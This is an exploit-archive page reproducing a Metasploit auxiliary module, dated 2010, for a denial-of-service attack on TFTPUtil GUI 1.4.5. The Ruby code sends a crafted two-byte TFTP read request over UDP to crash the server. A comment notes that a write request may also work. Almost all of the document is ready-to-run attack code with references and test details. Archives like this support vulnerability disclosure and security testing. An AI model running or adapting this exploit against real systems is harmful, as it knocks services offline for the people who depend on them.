ExploitFixes
TFTPUtil GUI 1.4.5 DoS (Meta) 2010-12-04 09:16:35

# Title: TFTPUtil GUI v1.4.5 Invalid Request DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Vuk Ivanovic
# Published: 2010-12-04
# Verified: yes

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

##
#
# TFTPGUI v1.4.5 Invalid Request DoS
#
# Tested on: Windows XP, SP2 (EN)
#
# Date tested: 11/27/2010
#
#
#
# Discovered by: Vuk Ivanovic(musashi42)
#
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos

def initialize(info = {})
super(update_info(info,
'Name' => 'TFTPGUI v1.4.5 Invalid Request DoS',
'Description' => %q{
The TFTPUtil GUI server version 1.4.5 can be
DOSed by sending a specially crafted read request. Depending
of the setup, sending write request "\x00\x02" may also
work. Discovered by musashi42.

},
'Author' => 'musashi42',
'License' => MSF_LICENSE,
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/12482'],
[ 'URL', 'http://www.securityfocus.com/bid/39872'],
],
'DisclosureDate' => 'December 04 2010'))

register_options([Opt::RPORT(69)])
end

def run
connect_udp
print_status("Sending read request...")
$stuff = "\00\x01"
udp_sock.put($stuff)
disconnect_udp
end
end